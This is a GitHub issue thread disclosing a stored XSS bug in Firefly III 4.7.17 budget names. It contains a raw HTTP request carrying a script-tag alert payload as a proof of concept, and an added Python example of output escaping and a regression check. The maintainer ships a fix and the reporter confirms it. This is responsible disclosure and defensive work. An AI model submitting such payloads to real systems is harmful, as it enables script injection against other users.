Stored XSS in budget name #2335

Closed
dayn1ne opened this issue Jul 15, 2019 · 7 comments

Comments

@dayn1ne
commented Jul 15, 2019

Description
The current version of Firefly III, version 4.7.17, is vulnerable to stored XSS due to a lack of filtering of user-supplied data in the budget name. A malicious attacker can create a specially crafted link which contains JavaScript code and assign it as a budget name. When a user who adds transactions with the malicious budget views the page with that transaction on the tag summary page (http://firefly.host/tags/show/$tag_number$), the malicious JavaScript code will be executed.

Steps to reproduce
I created a small video of the reproduction steps:
XSS Steps.zip

PoC

POST /budgets/store HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: firefly_session=<Your session here>;
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_token=<Your token here>=1&name=<script>alert("XSS PoC")</script>

Screenshot 2019-07-15 at 17 18 30
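The bug class in this report, as an added example that is not Firefly III's own code: a hypothetical minimal tag-summary row rendered with and without output encoding of the budget name, plus a regression check that the PoC payload above no longer yields a live script tag. The template, function names and the "Lunch"/"R&D" sample values are assumptions constructed for the example.

```python
import html
import re

# Constructed sample: the budget name submitted in the PoC request above.
POC_BUDGET_NAME = '<script>alert("XSS PoC")</script>'

# Hypothetical minimal template for one transaction row on a tag summary page.
# This is not Firefly III's own template; it only illustrates the two behaviours.
ROW_TEMPLATE = (
    '<tr><td class="transaction">{description}</td>'
    '<td class="budget">{budget}</td></tr>'
)


def render_row_vulnerable(description: str, budget_name: str) -> str:
    """'Before' behaviour: user-controlled strings are inserted verbatim,
    so a budget name containing markup becomes part of the page's DOM."""
    return ROW_TEMPLATE.format(description=description, budget=budget_name)


def render_row_fixed(description: str, budget_name: str) -> str:
    """'After' behaviour: every user-controlled string is HTML-escaped at
    output time.  The stored budget name is left untouched in the database,
    so legitimate names such as 'R&D' still display correctly."""
    return ROW_TEMPLATE.format(
        description=html.escape(description, quote=True),
        budget=html.escape(budget_name, quote=True),
    )


# A real <script> start tag; the escaped form '&lt;script&gt;' does not match.
SCRIPT_START_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(rendered_html: str) -> bool:
    """Regression check a test suite can run over rendered pages: does the
    output contain an unescaped <script> start tag?"""
    return SCRIPT_START_TAG.search(rendered_html) is not None


if __name__ == "__main__":
    print(render_row_vulnerable("Lunch", POC_BUDGET_NAME))
    print(render_row_fixed("Lunch", POC_BUDGET_NAME))
```

Escaping at output time rather than filtering on input is what keeps the fix complete: every page that shows the name (budget, category or tag views alike) goes through the same encoding.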

@JC5

Member

commented Jul 15, 2019

Thanks, nice find. I'll verify and push an update as soon as I can. You're mixing up tags and budgets by the way, is this correct?

@JC5

Member

commented Jul 15, 2019

Sorry, I see what you mean.

@JC5 JC5 closed this in 45ddb64 Jul 15, 2019

@JC5

Member

commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

@JC5 JC5 reopened this Jul 15, 2019

@JC5 JC5 added the bug label Jul 15, 2019

@dayn1ne

Author

commented Jul 15, 2019

> I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.
>
> I've reopened the issue as GitHub has automatically closed it.

I checked commit 45ddb64 and saw only changes to versions in some files and changed titles in others.

But anyway, I got the source code from https://github.com/firefly-iii/firefly-iii/releases/tag/4.7.17.1 and installed it for checking.

The vulnerability still exists.

I uploaded the video to Dropbox: https://www.dropbox.com/s/gdr87bh4pat5ly5/xss_2.mov?dl=0

@JC5 JC5 closed this in def3070 Jul 15, 2019

@JC5 JC5 reopened this Jul 15, 2019

@JC5

Member

commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

@dayn1ne

Author

commented Jul 15, 2019

> You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

Confirmed, I cannot reproduce the XSS.

Thank you for such a quick fix and for this wonderful budget app.
I will continue searching for security bugs and will inform you if I find any.

@JC5

Member

commented Jul 15, 2019

No problem, please do. You know where to find me!

@JC5 JC5 added the fixed label Jul 15, 2019

@JC5 JC5 closed this Aug 3, 2019
